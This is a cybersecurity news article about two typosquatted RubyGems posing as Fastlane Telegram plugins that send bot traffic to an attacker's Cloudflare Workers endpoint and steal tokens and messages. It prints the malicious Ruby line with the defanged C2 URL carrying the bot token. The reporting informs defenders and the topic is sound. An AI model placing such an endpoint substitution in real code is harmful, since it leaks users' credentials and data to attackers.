Cyber Security News

Hackers Weaponize Ruby Gems To Exfiltrate Telegram Tokens and Messages

A sophisticated supply chain attack has emerged targeting the RubyGems ecosystem, exploiting geopolitical tensions surrounding Vietnam’s recent Telegram ban to steal sensitive developer credentials and communications.

The malicious campaign involves two typosquatted Ruby gems designed to impersonate legitimate Fastlane plugins, silently redirecting Telegram API traffic through attacker-controlled infrastructure to harvest bot tokens, message content, and attached files.

The timing of this attack is particularly concerning, as the malicious packages appeared just days after Vietnam ordered a nationwide blocking of Telegram on May 21, 2025.

The threat actor behind the campaign strategically marketed these gems as “proxy” plugins to exploit the increased demand for Telegram workarounds among developers affected by the ban.

This opportunistic approach demonstrates how cybercriminals are rapidly adapting to exploit geopolitical events for targeted supply chain attacks.

Socket.dev analysts identified the campaign through their threat research team, uncovering two malicious gems published under the aliases Bùi nam, buidanhnam, and si_mobile.

The packages Fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram were designed to impersonate the legitimate fastlane-plugin-telegram project, which has over 600,000 downloads and is widely used for sending deployment notifications to Telegram channels from CI/CD pipelines.

Malicious plugin (Source – Socket.dev)

The attack’s sophistication lies in its minimal code modification approach. The threat actor copied the original project’s README, preserved the public API, and retained expected plugin behavior while making only one critical change.

The impact extends far beyond simple credential theft, as Fastlane operates within CI/CD pipelines that handle sensitive assets including signing keys, release binaries, and environment secrets, potentially compromising entire software build and release workflows.

Technical Analysis of the Infection Mechanism

The malicious gems represent a masterclass in deceptive simplicity, achieving maximum impact through minimal code alteration.

The threat actor’s approach centered on replacing a single line of code that redirects network traffic from Telegram’s legitimate API endpoint to an attacker-controlled command and control server.

Telegram Bot API Proxy (Source – Socket.dev)

In the legitimate Fastlane-plugin-telegram, messages are sent directly to Telegram’s official API using the standard endpoint:

uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")

However, in the malicious versions, this critical line was replaced with a hardcoded C2 endpoint:-

# Threat actor's proxy C2 endpoint; not Telegram
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")

This subtle substitution enables the threat actor to automatically capture bot tokens, chat identifiers, message content, and any uploaded files while maintaining the plugin’s expected functionality.

The malicious endpoint, hosted on Cloudflare Workers, presents itself as a benign Telegram Bot API proxy, claiming not to store or modify bot tokens.

However, the implementation remains entirely opaque, with no published source code or transparency measures that would characterize a legitimate proxy service.

The persistence of this attack vector is particularly troubling, as stolen tokens remain valid until manually revoked, creating a window for ongoing unauthorized access to victim Telegram bots and their associated data streams.

Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

CISA Warns of Hackers Actively Exploiting Windows Server Update Services RCE Vulnerability in the Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned organizations worldwide about active exploitation…

39 minutes ago

New Malware Attack Using Variable Functions and Cookies to Evade and Hide Their Malicious Scripts

A sophisticated malware campaign targeting WordPress sites has emerged, utilizing PHP variable functions and cookie-based…

2 hours ago

Threat Actors Tricks Target Users Via Impersonation and Fictional Financial Aid Offers

An international ecosystem of sophisticated scam operations has emerged, targeting vulnerable populations through impersonation tactics…

4 hours ago

TransparentTribe Attack Linux-Based Systems of Indian Military Organizations to Deliver DeskRAT

TransparentTribe, a Pakistani-nexus intrusion set active since at least 2013, has intensified its cyber espionage…

6 hours ago

Jingle Thief Attackers Exploiting Festive Season with Weaponized Gift Card Attacks

As the festive season approaches, organizations are witnessing a disturbing increase in targeted attacks on…

8 hours ago

Warlock Ransomware Actors Exploiting Sharepoint ToolShell Zero-Day Vulnerability in New Attack Wave

The cybersecurity landscape experienced a significant shift in July 2025 when threat actors associated with…

9 hours ago